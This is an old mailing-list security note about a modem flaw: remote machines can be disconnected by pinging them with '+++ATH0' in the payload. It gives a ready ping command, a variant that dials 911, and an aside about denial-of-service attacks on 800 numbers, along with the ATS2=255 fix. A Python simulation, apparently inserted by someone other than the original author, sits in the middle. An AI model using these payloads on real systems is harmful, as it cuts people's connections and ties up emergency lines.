A minor security note.

There seem to be quite a few cheap modems out there these days that do not
default to the guard time required by the original Hayes standard when
using +++ to put the modem into command mode.  In fact, it seems quite a
few non-USR modems are deficient in this regard.

This means that you can ICMP ping someone with modem commands stuffed into
the datagram, and when their machine echoes the packet back out over the
modem link, their modem will execute them.

Examples...

+++ATH0           (Hang up the phone)
+++ATH0,,,DT911   (Hang up the phone, and dial the computer into the
                   police emergency number)

I was sitting on IRC the other evening, and some script kiddie killed my
PPP connection with this trick.  Curious, those of us on the channel
tested our machines, and lo and behold, half the people had vulnerable
modems, including several who had new machines purchased in the last year.

A quick fix is to put ATS2=255 in your modem init string, which changes the
escape character.

There are all sorts of entertaining things one can do with the large
number of vulnerable machines on the Net at any given time, like
distributed denial of service attacks against corporate 800 numbers, and
the like.

To see if your modem will go into command mode, and drop your connection
without requiring a guard time around the +++, you can do the following
from another Unix box.

ping -p 2b2b2b415448300d <your IP>

If your line goes dead, and no pings are returned, you have a winning
modem.  As I said, this is a very old exploit which has been known for
years, but apparently not by people making the cheap modems which go into
most of today's PCs, when configured to their factory settings. 
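To make the guard-time point concrete, here is a small simulation of the Hayes escape detector, added for this note and not code from the original post: a modem honouring the default one-second guard time (S12=50) ignores a "+++" that arrives with data on both sides of it, a modem that skips the guard check acts on the ATH0 that follows, and ATS2=255 disables escape detection altogether. The link framing bytes and the byte timings are constructed.

```python
ESCAPE_DISABLED = 128        # Hayes: S2 register values above 127 disable the escape
FRAME_FLAG = b"\x7e"         # stand-in for the PPP frame delimiter around the packet (constructed)

def find_escape(stream, escape_char=ord("+"), guard=1.0, enforce_guard=True):
    """stream: list of (seconds, byte) as the bytes pass through the modem.
    Returns the index just after a recognised escape sequence, or None."""
    if escape_char >= ESCAPE_DISABLED:        # ATS2=255 (the post's fix) lands here
        return None
    for i in range(len(stream) - 2):
        if any(stream[i + k][1] != escape_char for k in range(3)):
            continue
        end = i + 3
        if not enforce_guard:                 # deficient modem: any inline "+++" escapes
            return end
        # Hayes guard time: at least `guard` seconds of silence before and after "+++"
        quiet_before = i == 0 or stream[i][0] - stream[i - 1][0] >= guard
        quiet_after = end == len(stream) or stream[end][0] - stream[end - 1][0] >= guard
        if quiet_before and quiet_after:
            return end
    return None

def command_executed(payload, spacing=0.001, **kw):
    """Model the echoed ICMP payload going back out through the modem as one
    back-to-back burst of bytes (`spacing` seconds apart, constructed timing),
    wrapped in link framing so the "+++" has data on both sides of it.
    Returns the AT command the modem would act on, or None."""
    burst = FRAME_FLAG + payload + FRAME_FLAG
    stream = [(k * spacing, b) for k, b in enumerate(burst)]
    end = find_escape(stream, **kw)
    if end is None:
        return None
    line = bytes(b for _, b in stream[end:]).split(b"\r", 1)[0]
    return line.decode("ascii", "replace")

# The payload behind the post's "ping -p 2b2b2b415448300d": b"+++ATH0\r".
PAYLOAD = bytes.fromhex("2b2b2b415448300d")

if __name__ == "__main__":
    print(command_executed(PAYLOAD))                        # None: guard time honoured
    print(command_executed(PAYLOAD, enforce_guard=False))   # ATH0: modem hangs up
    print(command_executed(PAYLOAD, enforce_guard=False, escape_char=255))  # None after ATS2=255
```

Note that with the escape disabled the only way back to command mode on a live connection is dropping DTR, which is the trade-off the ATS2=255 fix makes.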

We now return you to your regular programming. 

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
